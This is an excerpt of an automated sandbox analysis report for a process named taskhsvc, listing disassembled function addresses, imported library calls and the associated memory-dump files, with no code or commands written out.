    • Associated: 00000013.00000002.1855722372.004A3000.00000008.sdmp
    • Associated: 00000013.00000002.1855730014.004A8000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_19_2_1c0000_taskhsvc.jbxd
    Function 002DF474, Relevance: 11.0, APIs: 4, Strings: 2, Instructions: 477
    APIs
    • abort.MSVCRT ref: 002DF514
    • strlen.MSVCRT ref: 002DF53D
    • memchr.MSVCRT ref: 002DF571
      • Part of subcall function 002DE4A0: abort.MSVCRT ref: 002DE529
      • Part of subcall function 002DE4A0: abort.MSVCRT ref: 002DE5BE
      • Part of subcall function 002DE4A0: memchr.MSVCRT ref: 002DE5EE
      • Part of subcall function 002DE4A0: abort.MSVCRT ref: 002DECD7
      • Part of subcall function 002DE4A0: memchr.MSVCRT ref: 002DED07
      • Part of subcall function 002DE4A0: memchr.MSVCRT ref: 002DEDAC
      • Part of subcall function 002DE4A0: abort.MSVCRT ref: 002DEFAD
      • Part of subcall function 002DE4A0: memchr.MSVCRT ref: 002DEFD7
      • Part of subcall function 002DE4A0: strcmp.MSVCRT ref: 002DF193
      • Part of subcall function 002DE4A0: strcmp.MSVCRT ref: 002DF262
      • Part of subcall function 002DE4A0: __stack_chk_fail.LIBSSP-0 ref: 002DF466
      • Part of subcall function 002DDDB7: __stack_chk_fail.LIBSSP-0 ref: 002DDDF1
      • Part of subcall function 00319D53: __stack_chk_fail.LIBSSP-0 ref: 00319DB3
      • Part of subcall function 00322710: abort.MSVCRT ref: 00322766
      • Part of subcall function 00322710: abort.MSVCRT ref: 003227B5
      • Part of subcall function 00322710: __stack_chk_fail.LIBSSP-0 ref: 0032281B
      • Part of subcall function 00313842: __stack_chk_fail.LIBSSP-0 ref: 003138B7
    • __stack_chk_fail.LIBSSP-0 ref: 002DFC98
      • Part of subcall function 00316562: strrchr.MSVCRT ref: 00316586
      • Part of subcall function 00316562: strrchr.MSVCRT ref: 0031659C
      • Part of subcall function 00316562: __stack_chk_fail.LIBSSP-0 ref: 00316601
      • Part of subcall function 00319764: __stack_chk_fail.LIBSSP-0 ref: 00319857
    Strings
    Memory Dump Source
    • Source File: 00000013.00000002.1855329417.002DC000.00000040.sdmp, Offset: 001C0000, based on PE: true
    • Associated: 00000013.00000002.1854999429.001C0000.00000002.sdmp
    • Associated: 00000013.00000002.1855013399.001C1000.00000020.sdmp
    • Associated: 00000013.00000002.1855026342.001C9000.00000080.sdmp
    • Associated: 00000013.00000002.1855040395.001CA000.00000040.sdmp
    • Associated: 00000013.00000002.1855065746.00225000.00000080.sdmp
    • Associated: 00000013.00000002.1855077166.00228000.00000040.sdmp
    • Associated: 00000013.00000002.1855089255.0022F000.00000080.sdmp
    • Associated: 00000013.00000002.1855104216.00230000.00000040.sdmp
    • Associated: 00000013.00000002.1855122824.00266000.00000080.sdmp
    • Associated: 00000013.00000002.1855138358.00267000.00000040.sdmp
    • Associated: 00000013.00000002.1855155118.0028B000.00000080.sdmp
    • Associated: 00000013.00000002.1855168257.0028C000.00000040.sdmp
    • Associated: 00000013.00000002.1855182515.0028D000.00000080.sdmp
    • Associated: 00000013.00000002.1855196147.00290000.00000040.sdmp
    • Associated: 00000013.00000002.1855225498.002D3000.00000080.sdmp
    • Associated: 00000013.00000002.1855239885.002D4000.00000040.sdmp
    • Associated: 00000013.00000002.1855254056.002D6000.00000080.sdmp
    • Associated: 00000013.00000002.1855272578.002D7000.00000040.sdmp
    • Associated: 00000013.00000002.1855294963.002D8000.00000080.sdmp
    • Associated: 00000013.00000002.1855305598.002D9000.00000040.sdmp
    • Associated: 00000013.00000002.1855317495.002DA000.00000080.sdmp
    • Associated: 00000013.00000002.1855351346.00348000.00000080.sdmp
    • Associated: 00000013.00000002.1855370256.003BA000.00000040.sdmp
    • Associated: 00000013.00000002.1855382391.003C3000.00000080.sdmp
    • Associated: 00000013.00000002.1855395021.003C4000.00000040.sdmp
    • Associated: 00000013.00000002.1855406286.003C6000.00000080.sdmp
    • Associated: 00000013.00000002.1855419002.003CA000.00000040.sdmp
    • Associated: 00000013.00000002.1855435469.003CC000.00000080.sdmp
    • Associated: 00000013.00000002.1855447997.003CE000.00000040.sdmp
    • Associated: 00000013.00000002.1855459106.003CF000.00000080.sdmp
    • Associated: 00000013.00000002.1855472726.003D0000.00000040.sdmp
    • Associated: 00000013.00000002.1855490051.003D3000.00000080.sdmp
    • Associated: 00000013.00000002.1855500813.003D4000.00000040.sdmp
    • Associated: 00000013.00000002.1855512417.003D8000.00000080.sdmp
    • Associated: 00000013.00000002.1855523270.003D9000.00000040.sdmp
    • Associated: 00000013.00000002.1855533374.003E0000.00000080.sdmp
    • Associated: 00000013.00000002.1855544480.003E1000.00000040.sdmp
    • Associated: 00000013.00000002.1855556363.003E4000.00000080.sdmp
    • Associated: 00000013.00000002.1855569787.003E5000.00000040.sdmp
    • Associated: 00000013.00000002.1855588250.003F6000.00000080.sdmp
    • Associated: 00000013.00000002.1855603610.003FE000.00000004.sdmp
    • Associated: 00000013.00000002.1855617063.003FF000.00000008.sdmp
    • Associated: 00000013.00000002.1855627940.00400000.00000004.sdmp
    • Associated: 00000013.00000002.1855639237.00402000.00000008.sdmp
    • Associated: 00000013.00000002.1855664504.00403000.00000004.sdmp
    • Associated: 00000013.00000002.1855675077.00405000.00000008.sdmp
    • Associated: 00000013.00000002.1855685431.0040B000.00000004.sdmp
    • Associated: 00000013.00000002.1855695362.0040C000.00000002.sdmp
    • Associated: 00000013.00000002.1855714597.0049D000.00000004.sdmp
    • Associated: 00000013.00000002.1855722372.004A3000.00000008.sdmp
    • Associated: 00000013.00000002.1855730014.004A8000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_19_2_1c0000_taskhsvc.jbxd
    Function 001E5B8F, Relevance: 10.8, APIs: 3, Strings: 3, Instructions: 280
    APIs
      • Part of subcall function 001E5A9A: abort.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,001E5BF8), ref: 001E5B33
      • Part of subcall function 001E5A9A: __stack_chk_fail.LIBSSP-0 ref: 001E5B88
    • __stack_chk_fail.LIBSSP-0 ref: 001E5FE0
      • Part of subcall function 00313842: __stack_chk_fail.LIBSSP-0 ref: 003138B7
      • Part of subcall function 001E3214: strlen.MSVCRT ref: 001E323C
      • Part of subcall function 001E3214: __stack_chk_fail.LIBSSP-0 ref: 001E3269
    • atoi.MSVCRT ref: 001E5DE7
    • abort.MSVCRT ref: 001E5F86
      • Part of subcall function 0032107E: abort.MSVCRT ref: 003210D1
      • Part of subcall function 0032107E: malloc.MSVCRT ref: 003210E9
      • Part of subcall function 0032107E: exit.MSVCRT ref: 0032112A
      • Part of subcall function 0032107E: __stack_chk_fail.LIBSSP-0 ref: 0032113D
      • Part of subcall function 001E52AC: abort.MSVCRT ref: 001E533A
      • Part of subcall function 001E52AC: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,?,?,?,?,?,?,001C33C1), ref: 001E5350
      • Part of subcall function 00316562: strrchr.MSVCRT ref: 00316586
      • Part of subcall function 00316562: strrchr.MSVCRT ref: 0031659C
      • Part of subcall function 00316562: __stack_chk_fail.LIBSSP-0 ref: 00316601
      • Part of subcall function 00319764: __stack_chk_fail.LIBSSP-0 ref: 00319857
      • Part of subcall function 001E3826: abort.MSVCRT ref: 001E390F
      • Part of subcall function 001E3826: abort.MSVCRT ref: 001E398A
      • Part of subcall function 001E3826: abort.MSVCRT ref: 001E3A1C
      • Part of subcall function 001E3826: memcpy.MSVCRT ref: 001E3A4E
      • Part of subcall function 001E3826: memcpy.MSVCRT ref: 001E3AB6
      • Part of subcall function 001E3826: abort.MSVCRT ref: 001E3B2D
      • Part of subcall function 001E3826: __stack_chk_fail.LIBSSP-0 ref: 001E3B52
    Strings
    Memory Dump Source
    • Source File: 00000013.00000002.1855040395.001CA000.00000040.sdmp, Offset: 001C0000, based on PE: true
    • Associated: 00000013.00000002.1854999429.001C0000.00000002.sdmp
    • Associated: 00000013.00000002.1855013399.001C1000.00000020.sdmp
    • Associated: 00000013.00000002.1855026342.001C9000.00000080.sdmp
    • Associated: 00000013.00000002.1855065746.00225000.00000080.sdmp
    • Associated: 00000013.00000002.1855077166.00228000.00000040.sdmp
    • Associated: 00000013.00000002.1855089255.0022F000.00000080.sdmp
    • Associated: 00000013.00000002.1855104216.00230000.00000040.sdmp
    • Associated: 00000013.00000002.1855122824.00266000.00000080.sdmp
    • Associated: 00000013.00000002.1855138358.00267000.00000040.sdmp
    • Associated: 00000013.00000002.1855155118.0028B000.00000080.sdmp
    • Associated: 00000013.00000002.1855168257.0028C000.00000040.sdmp
    • Associated: 00000013.00000002.1855182515.0028D000.00000080.sdmp
    • Associated: 00000013.00000002.1855196147.00290000.00000040.sdmp
    • Associated: 00000013.00000002.1855225498.002D3000.00000080.sdmp
    • Associated: 00000013.00000002.1855239885.002D4000.00000040.sdmp
    • Associated: 00000013.00000002.1855254056.002D6000.00000080.sdmp
    • Associated: 00000013.00000002.1855272578.002D7000.00000040.sdmp
    • Associated: 00000013.00000002.1855294963.002D8000.00000080.sdmp
    • Associated: 00000013.00000002.1855305598.002D9000.00000040.sdmp
    • Associated: 00000013.00000002.1855317495.002DA000.00000080.sdmp
    • Associated: 00000013.00000002.1855329417.002DC000.00000040.sdmp
    • Associated: 00000013.00000002.1855351346.00348000.00000080.sdmp
    • Associated: 00000013.00000002.1855370256.003BA000.00000040.sdmp
    • Associated: 00000013.00000002.1855382391.003C3000.00000080.sdmp
    • Associated: 00000013.00000002.1855395021.003C4000.00000040.sdmp
    • Associated: 00000013.00000002.1855406286.003C6000.00000080.sdmp
    • Associated: 00000013.00000002.1855419002.003CA000.00000040.sdmp
    • Associated: 00000013.00000002.1855435469.003CC000.00000080.sdmp
    • Associated: 00000013.00000002.1855447997.003CE000.00000040.sdmp
    • Associated: 00000013.00000002.1855459106.003CF000.00000080.sdmp
    • Associated: 00000013.00000002.1855472726.003D0000.00000040.sdmp
    • Associated: 00000013.00000002.1855490051.003D3000.00000080.sdmp
    • Associated: 00000013.00000002.1855500813.003D4000.00000040.sdmp
    • Associated: 00000013.00000002.1855512417.003D8000.00000080.sdmp
    • Associated: 00000013.00000002.1855523270.003D9000.00000040.sdmp
    • Associated: 00000013.00000002.1855533374.003E0000.00000080.sdmp
    • Associated: 00000013.00000002.1855544480.003E1000.00000040.sdmp
    • Associated: 00000013.00000002.1855556363.003E4000.00000080.sdmp
    • Associated: 00000013.00000002.1855569787.003E5000.00000040.sdmp
    • Associated: 00000013.00000002.1855588250.003F6000.00000080.sdmp
    • Associated: 00000013.00000002.1855603610.003FE000.00000004.sdmp
    • Associated: 00000013.00000002.1855617063.003FF000.00000008.sdmp
    • Associated: 00000013.00000002.1855627940.00400000.00000004.sdmp
    • Associated: 00000013.00000002.1855639237.00402000.00000008.sdmp
    • Associated: 00000013.00000002.1855664504.00403000.00000004.sdmp
    • Associated: 00000013.00000002.1855675077.00405000.00000008.sdmp
    • Associated: 00000013.00000002.1855685431.0040B000.00000004.sdmp
    • Associated: 00000013.00000002.1855695362.0040C000.00000002.sdmp
    • Associated: 00000013.00000002.1855714597.0049D000.00000004.sdmp
    • Associated: 00000013.00000002.1855722372.004A3000.00000008.sdmp
    • Associated: 00000013.00000002.1855730014.004A8000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_19_2_1c0000_taskhsvc.jbxd
    Function 001C56C3, Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 210
    APIs
      • Part of subcall function 0021F792: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,00206074), ref: 0021F7B2
    • time.MSVCRT ref: 001C56F9
      • Part of subcall function 0032545C: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,?,?,001CA788), ref: 00325486
      • Part of subcall function 00206B33: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,?,?,?,?,001C57A7), ref: 00206C08
      • Part of subcall function 00205E05: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,001C57AC), ref: 00205F31
      • Part of subcall function 0020617A: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,001C57B1), ref: 00206215
      • Part of subcall function 00205F3D: __stack_chk_fail.LIBSSP-0 ref: 0020604B
      • Part of subcall function 0020692E: free.MSVCRT ref: 00206A1C
      • Part of subcall function 0020692E: free.MSVCRT ref: 00206A56
      • Part of subcall function 0020692E: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,?,?,?,?,001C57BB), ref: 00206A72
      • Part of subcall function 0025B356: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,?,?,002241AB), ref: 0025B3B6
    • __stack_chk_fail.LIBSSP-0 ref: 001C59FE
      • Part of subcall function 0025B0C8: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,0025A37E,?,?,?,?,?,?,?,?,?,0025A412), ref: 0025B107
      • Part of subcall function 001C18D5: __stack_chk_fail.LIBSSP-0 ref: 001C18F5
    • free.MSVCRT ref: 001C59A4
      • Part of subcall function 0025A3A0: __stack_chk_fail.LIBSSP-0 ref: 0025A3EA
    • free.MSVCRT ref: 001C58EB
      • Part of subcall function 0025A3F1: __stack_chk_fail.LIBSSP-0 ref: 0025A45C
      • Part of subcall function 0032FA37: __stack_chk_fail.LIBSSP-0 ref: 0032FA98
      • Part of subcall function 00313842: __stack_chk_fail.LIBSSP-0 ref: 003138B7
      • Part of subcall function 00208197: __stack_chk_fail.LIBSSP-0 ref: 00208216
      • Part of subcall function 002C5384: __stack_chk_fail.LIBSSP-0 ref: 002C5456
    Strings
    Memory Dump Source
    • Source File: 00000013.00000002.1855013399.001C1000.00000020.sdmp, Offset: 001C0000, based on PE: true
    • Associated: 00000013.00000002.1854999429.001C0000.00000002.sdmp
    • Associated: 00000013.00000002.1855026342.001C9000.00000080.sdmp
    • Associated: 00000013.00000002.1855040395.001CA000.00000040.sdmp
    • Associated: 00000013.00000002.1855065746.00225000.00000080.sdmp
    • Associated: 00000013.00000002.1855077166.00228000.00000040.sdmp
    • Associated: 00000013.00000002.1855089255.0022F000.00000080.sdmp
    • Associated: 00000013.00000002.1855104216.00230000.00000040.sdmp
    • Associated: 00000013.00000002.1855122824.00266000.00000080.sdmp
    • Associated: 00000013.00000002.1855138358.00267000.00000040.sdmp
    • Associated: 00000013.00000002.1855155118.0028B000.00000080.sdmp
    • Associated: 00000013.00000002.1855168257.0028C000.00000040.sdmp
    • Associated: 00000013.00000002.1855182515.0028D000.00000080.sdmp
    • Associated: 00000013.00000002.1855196147.00290000.00000040.sdmp
    • Associated: 00000013.00000002.1855225498.002D3000.00000080.sdmp
    • Associated: 00000013.00000002.1855239885.002D4000.00000040.sdmp
    • Associated: 00000013.00000002.1855254056.002D6000.00000080.sdmp
    • Associated: 00000013.00000002.1855272578.002D7000.00000040.sdmp
    • Associated: 00000013.00000002.1855294963.002D8000.00000080.sdmp
    • Associated: 00000013.00000002.1855305598.002D9000.00000040.sdmp
    • Associated: 00000013.00000002.1855317495.002DA000.00000080.sdmp
    • Associated: 00000013.00000002.1855329417.002DC000.00000040.sdmp
    • Associated: 00000013.00000002.1855351346.00348000.00000080.sdmp
    • Associated: 00000013.00000002.1855370256.003BA000.00000040.sdmp
    • Associated: 00000013.00000002.1855382391.003C3000.00000080.sdmp
    • Associated: 00000013.00000002.1855395021.003C4000.00000040.sdmp
    • Associated: 00000013.00000002.1855406286.003C6000.00000080.sdmp
    • Associated: 00000013.00000002.1855419002.003CA000.00000040.sdmp
    • Associated: 00000013.00000002.1855435469.003CC000.00000080.sdmp
    • Associated: 00000013.00000002.1855447997.003CE000.00000040.sdmp
    • Associated: 00000013.00000002.1855459106.003CF000.00000080.sdmp
    • Associated: 00000013.00000002.1855472726.003D0000.00000040.sdmp
    • Associated: 00000013.00000002.1855490051.003D3000.00000080.sdmp
    • Associated: 00000013.00000002.1855500813.003D4000.00000040.sdmp
    • Associated: 00000013.00000002.1855512417.003D8000.00000080.sdmp
    • Associated: 00000013.00000002.1855523270.003D9000.00000040.sdmp
    • Associated: 00000013.00000002.1855533374.003E0000.00000080.sdmp
    • Associated: 00000013.00000002.1855544480.003E1000.00000040.sdmp
    • Associated: 00000013.00000002.1855556363.003E4000.00000080.sdmp
    • Associated: 00000013.00000002.1855569787.003E5000.00000040.sdmp
    • Associated: 00000013.00000002.1855588250.003F6000.00000080.sdmp
    • Associated: 00000013.00000002.1855603610.003FE000.00000004.sdmp
    • Associated: 00000013.00000002.1855617063.003FF000.00000008.sdmp
    • Associated: 00000013.00000002.1855627940.00400000.00000004.sdmp
    • Associated: 00000013.00000002.1855639237.00402000.00000008.sdmp
    • Associated: 00000013.00000002.1855664504.00403000.00000004.sdmp
    • Associated: 00000013.00000002.1855675077.00405000.00000008.sdmp
    • Associated: 00000013.00000002.1855685431.0040B000.00000004.sdmp
    • Associated: 00000013.00000002.1855695362.0040C000.00000002.sdmp
    • Associated: 00000013.00000002.1855714597.0049D000.00000004.sdmp
    • Associated: 00000013.00000002.1855722372.004A3000.00000008.sdmp
    • Associated: 00000013.00000002.1855730014.004A8000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_19_2_1c0000_taskhsvc.jbxd
    Function 00229FAA, Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 159
    APIs
    • free.MSVCRT ref: 0022A1E7
      • Part of subcall function 00229D8C: strcmp.MSVCRT ref: 00229E0E
      • Part of subcall function 00229D8C: free.MSVCRT ref: 00229E60
      • Part of subcall function 00229D8C: free.MSVCRT ref: 00229E9F
      • Part of subcall function 00229D8C: strcmp.MSVCRT ref: 00229ED1
      • Part of subcall function 00229D8C: __stack_chk_fail.LIBSSP-0 ref: 00229F66
    • free.MSVCRT ref: 0022A03C
    • __stack_chk_fail.LIBSSP-0 ref: 0022A20C
      • Part of subcall function 0032587B: _stati64.MSVCRT ref: 00325913
      • Part of subcall function 0032587B: free.MSVCRT ref: 0032592C
      • Part of subcall function 0032587B: __stack_chk_fail.LIBSSP-0 ref: 003259BE
      • Part of subcall function 00326B1B: abort.MSVCRT ref: 00326B85
      • Part of subcall function 00326B1B: strerror.MSVCRT ref: 00326BFE
      • Part of subcall function 00326B1B: _close.MSVCRT ref: 00326C73
      • Part of subcall function 00326B1B: _close.MSVCRT ref: 00326CDE
      • Part of subcall function 00326B1B: strerror.MSVCRT ref: 00326D57
      • Part of subcall function 00326B1B: free.MSVCRT ref: 00326D9F
      • Part of subcall function 00326B1B: _close.MSVCRT ref: 00326DB1
      • Part of subcall function 00326B1B: strchr.MSVCRT ref: 00326DED
      • Part of subcall function 00326B1B: strlen.MSVCRT ref: 00326E4C
      • Part of subcall function 00326B1B: free.MSVCRT ref: 00326EEB
      • Part of subcall function 00326B1B: _close.MSVCRT ref: 00326EFD
      • Part of subcall function 00326B1B: _close.MSVCRT ref: 00326F1D
      • Part of subcall function 00326B1B: memcpy.MSVCRT ref: 00326F3D
      • Part of subcall function 00326B1B: __stack_chk_fail.LIBSSP-0 ref: 00326F50
    • free.MSVCRT ref: 0022A14F
      • Part of subcall function 00313842: __stack_chk_fail.LIBSSP-0 ref: 003138B7
      • Part of subcall function 003213EE: abort.MSVCRT ref: 0032143E
      • Part of subcall function 003213EE: _strdup.MSVCRT ref: 00321449
      • Part of subcall function 003213EE: exit.MSVCRT ref: 0032148A
      • Part of subcall function 003213EE: __stack_chk_fail.LIBSSP-0 ref: 0032149D
    Strings
    Memory Dump Source
    • Source File: 00000013.00000002.1855077166.00228000.00000040.sdmp, Offset: 001C0000, based on PE: true
    • Associated: 00000013.00000002.1854999429.001C0000.00000002.sdmp
    • Associated: 00000013.00000002.1855013399.001C1000.00000020.sdmp
    • Associated: 00000013.00000002.1855026342.001C9000.00000080.sdmp
    • Associated: 00000013.00000002.1855040395.001CA000.00000040.sdmp
    • Associated: 00000013.00000002.1855065746.00225000.00000080.sdmp
    • Associated: 00000013.00000002.1855089255.0022F000.00000080.sdmp
    • Associated: 00000013.00000002.1855104216.00230000.00000040.sdmp
    • Associated: 00000013.00000002.1855122824.00266000.00000080.sdmp
    • Associated: 00000013.00000002.1855138358.00267000.00000040.sdmp
    • Associated: 00000013.00000002.1855155118.0028B000.00000080.sdmp
    • Associated: 00000013.00000002.1855168257.0028C000.00000040.sdmp
    • Associated: 00000013.00000002.1855182515.0028D000.00000080.sdmp
    • Associated: 00000013.00000002.1855196147.00290000.00000040.sdmp
    • Associated: 00000013.00000002.1855225498.002D3000.00000080.sdmp
    • Associated: 00000013.00000002.1855239885.002D4000.00000040.sdmp
    • Associated: 00000013.00000002.1855254056.002D6000.00000080.sdmp
    • Associated: 00000013.00000002.1855272578.002D7000.00000040.sdmp
    • Associated: 00000013.00000002.1855294963.002D8000.00000080.sdmp
    • Associated: 00000013.00000002.1855305598.002D9000.00000040.sdmp
    • Associated: 00000013.00000002.1855317495.002DA000.00000080.sdmp
    • Associated: 00000013.00000002.1855329417.002DC000.00000040.sdmp
    • Associated: 00000013.00000002.1855351346.00348000.00000080.sdmp
    • Associated: 00000013.00000002.1855370256.003BA000.00000040.sdmp
    • Associated: 00000013.00000002.1855382391.003C3000.00000080.sdmp
    • Associated: 00000013.00000002.1855395021.003C4000.00000040.sdmp
    • Associated: 00000013.00000002.1855406286.003C6000.00000080.sdmp
    • Associated: 00000013.00000002.1855419002.003CA000.00000040.sdmp
    • Associated: 00000013.00000002.1855435469.003CC000.00000080.sdmp
    • Associated: 00000013.00000002.1855447997.003CE000.00000040.sdmp
    • Associated: 00000013.00000002.1855459106.003CF000.00000080.sdmp
    • Associated: 00000013.00000002.1855472726.003D0000.00000040.sdmp
    • Associated: 00000013.00000002.1855490051.003D3000.00000080.sdmp
    • Associated: 00000013.00000002.1855500813.003D4000.00000040.sdmp
    • Associated: 00000013.00000002.1855512417.003D8000.00000080.sdmp
    • Associated: 00000013.00000002.1855523270.003D9000.00000040.sdmp
    • Associated: 00000013.00000002.1855533374.003E0000.00000080.sdmp
    • Associated: 00000013.00000002.1855544480.003E1000.00000040.sdmp
    • Associated: 00000013.00000002.1855556363.003E4000.00000080.sdmp
    • Associated: 00000013.00000002.1855569787.003E5000.00000040.sdmp
    • Associated: 00000013.00000002.1855588250.003F6000.00000080.sdmp
    • Associated: 00000013.00000002.1855603610.003FE000.00000004.sdmp
    • Associated: 00000013.00000002.1855617063.003FF000.00000008.sdmp
    • Associated: 00000013.00000002.1855627940.00400000.00000004.sdmp
    • Associated: 00000013.00000002.1855639237.00402000.00000008.sdmp
    • Associated: 00000013.00000002.1855664504.00403000.00000004.sdmp
    • Associated: 00000013.00000002.1855675077.00405000.00000008.sdmp
    • Associated: 00000013.00000002.1855685431.0040B000.00000004.sdmp
    • Associated: 00000013.00000002.1855695362.0040C000.00000002.sdmp
    • Associated: 00000013.00000002.1855714597.0049D000.00000004.sdmp
    • Associated: 00000013.00000002.1855722372.004A3000.00000008.sdmp
    • Associated: 00000013.00000002.1855730014.004A8000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_19_2_1c0000_taskhsvc.jbxd
    Function 003259C5, Relevance: 10.7, APIs: 7, Instructions: 151
    APIs
    • abort.MSVCRT ref: 00325A21
      • Part of subcall function 003213EE: abort.MSVCRT ref: 0032143E
      • Part of subcall function 003213EE: _strdup.MSVCRT ref: 00321449
      • Part of subcall function 003213EE: exit.MSVCRT ref: 0032148A
      • Part of subcall function 003213EE: __stack_chk_fail.LIBSSP-0 ref: 0032149D
      • Part of subcall function 003257BB: strlen.MSVCRT ref: 003257D7
      • Part of subcall function 003257BB: __stack_chk_fail.LIBSSP-0 ref: 00325841
    • _stati64.MSVCRT ref: 00325A8E
    • free.MSVCRT ref: 00325AA7
    • strerror.MSVCRT ref: 00325AD7
    • _mkdir.MSVCRT ref: 00325B54
    • strerror.MSVCRT ref: 00325B72
    • __stack_chk_fail.LIBSSP-0 ref: 00325C45
      • Part of subcall function 00313842: __stack_chk_fail.LIBSSP-0 ref: 003138B7
      • Part of subcall function 00316562: strrchr.MSVCRT ref: 00316586
      • Part of subcall function 00316562: strrchr.MSVCRT ref: 0031659C
      • Part of subcall function 00316562: __stack_chk_fail.LIBSSP-0 ref: 00316601
      • Part of subcall function 00319764: __stack_chk_fail.LIBSSP-0 ref: 00319857
    Memory Dump Source
    • Source File: 00000013.00000002.1855329417.002DC000.00000040.sdmp, Offset: 001C0000, based on PE: true
    • Associated: 00000013.00000002.1854999429.001C0000.00000002.sdmp
    • Associated: 00000013.00000002.1855013399.001C1000.00000020.sdmp
    • Associated: 00000013.00000002.1855026342.001C9000.00000080.sdmp
    • Associated: 00000013.00000002.1855040395.001CA000.00000040.sdmp
    • Associated: 00000013.00000002.1855065746.00225000.00000080.sdmp
    • Associated: 00000013.00000002.1855077166.00228000.00000040.sdmp
    • Associated: 00000013.00000002.1855089255.0022F000.00000080.sdmp
    • Associated: 00000013.00000002.1855104216.00230000.00000040.sdmp
    • Associated: 00000013.00000002.1855122824.00266000.00000080.sdmp
    • Associated: 00000013.00000002.1855138358.00267000.00000040.sdmp
    • Associated: 00000013.00000002.1855155118.0028B000.00000080.sdmp
    • Associated: 00000013.00000002.1855168257.0028C000.00000040.sdmp
    • Associated: 00000013.00000002.1855182515.0028D000.00000080.sdmp
    • Associated: 00000013.00000002.1855196147.00290000.00000040.sdmp
    • Associated: 00000013.00000002.1855225498.002D3000.00000080.sdmp
    • Associated: 00000013.00000002.1855239885.002D4000.00000040.sdmp
    • Associated: 00000013.00000002.1855254056.002D6000.00000080.sdmp
    • Associated: 00000013.00000002.1855272578.002D7000.00000040.sdmp
    • Associated: 00000013.00000002.1855294963.002D8000.00000080.sdmp
    • Associated: 00000013.00000002.1855305598.002D9000.00000040.sdmp
    • Associated: 00000013.00000002.1855317495.002DA000.00000080.sdmp
    • Associated: 00000013.00000002.1855351346.00348000.00000080.sdmp
    • Associated: 00000013.00000002.1855370256.003BA000.00000040.sdmp
    • Associated: 00000013.00000002.1855382391.003C3000.00000080.sdmp
    • Associated: 00000013.00000002.1855395021.003C4000.00000040.sdmp
    • Associated: 00000013.00000002.1855406286.003C6000.00000080.sdmp
    • Associated: 00000013.00000002.1855419002.003CA000.00000040.sdmp
    • Associated: 00000013.00000002.1855435469.003CC000.00000080.sdmp
    • Associated: 00000013.00000002.1855447997.003CE000.00000040.sdmp
    • Associated: 00000013.00000002.1855459106.003CF000.00000080.sdmp
    • Associated: 00000013.00000002.1855472726.003D0000.00000040.sdmp
    • Associated: 00000013.00000002.1855490051.003D3000.00000080.sdmp
    • Associated: 00000013.00000002.1855500813.003D4000.00000040.sdmp
    • Associated: 00000013.00000002.1855512417.003D8000.00000080.sdmp
    • Associated: 00000013.00000002.1855523270.003D9000.00000040.sdmp
    • Associated: 00000013.00000002.1855533374.003E0000.00000080.sdmp
    • Associated: 00000013.00000002.1855544480.003E1000.00000040.sdmp
    • Associated: 00000013.00000002.1855556363.003E4000.00000080.sdmp
    • Associated: 00000013.00000002.1855569787.003E5000.00000040.sdmp
    • Associated: 00000013.00000002.1855588250.003F6000.00000080.sdmp
    • Associated: 00000013.00000002.1855603610.003FE000.00000004.sdmp
    • Associated: 00000013.00000002.1855617063.003FF000.00000008.sdmp
    • Associated: 00000013.00000002.1855627940.00400000.00000004.sdmp
    • Associated: 00000013.00000002.1855639237.00402000.00000008.sdmp
    • Associated: 00000013.00000002.1855664504.00403000.00000004.sdmp
    • Associated: 00000013.00000002.1855675077.00405000.00000008.sdmp
    • Associated: 00000013.00000002.1855685431.0040B000.00000004.sdmp
    • Associated: 00000013.00000002.1855695362.0040C000.00000002.sdmp
    • Associated: 00000013.00000002.1855714597.0049D000.00000004.sdmp
    • Associated: 00000013.00000002.1855722372.004A3000.00000008.sdmp
    • Associated: 00000013.00000002.1855730014.004A8000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_19_2_1c0000_taskhsvc.jbxd
    Function 001E4243, Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 134
    APIs
      • Part of subcall function 001E331A: __stack_chk_fail.LIBSSP-0 ref: 001E335F
      • Part of subcall function 001E32E4: __stack_chk_fail.LIBSSP-0 ref: 001E3313
    • recv.WS2_32 ref: 001E42C1
    • abort.MSVCRT ref: 001E4431
      • Part of subcall function 00313842: __stack_chk_fail.LIBSSP-0 ref: 003138B7
    • __stack_chk_fail.LIBSSP-0 ref: 001E4444
      • Part of subcall function 00316562: strrchr.MSVCRT ref: 00316586
      • Part of subcall function 00316562: strrchr.MSVCRT ref: 0031659C
      • Part of subcall function 00316562: __stack_chk_fail.LIBSSP-0 ref: 00316601
      • Part of subcall function 00319764: __stack_chk_fail.LIBSSP-0 ref: 00319857
      • Part of subcall function 0031910D: __stack_chk_fail.LIBSSP-0 ref: 00319194
    Strings
    Memory Dump Source
    • Source File: 00000013.00000002.1855040395.001CA000.00000040.sdmp, Offset: 001C0000, based on PE: true
    • Associated: 00000013.00000002.1854999429.001C0000.00000002.sdmp
    • Associated: 00000013.00000002.1855013399.001C1000.00000020.sdmp
    • Associated: 00000013.00000002.1855026342.001C9000.00000080.sdmp
    • Associated: 00000013.00000002.1855065746.00225000.00000080.sdmp
    • Associated: 00000013.00000002.1855077166.00228000.00000040.sdmp
    • Associated: 00000013.00000002.1855089255.0022F000.00000080.sdmp
    • Associated: 00000013.00000002.1855104216.00230000.00000040.sdmp
    • Associated: 00000013.00000002.1855122824.00266000.00000080.sdmp
    • Associated: 00000013.00000002.1855138358.00267000.00000040.sdmp
    • Associated: 00000013.00000002.1855155118.0028B000.00000080.sdmp
    • Associated: 00000013.00000002.1855168257.0028C000.00000040.sdmp
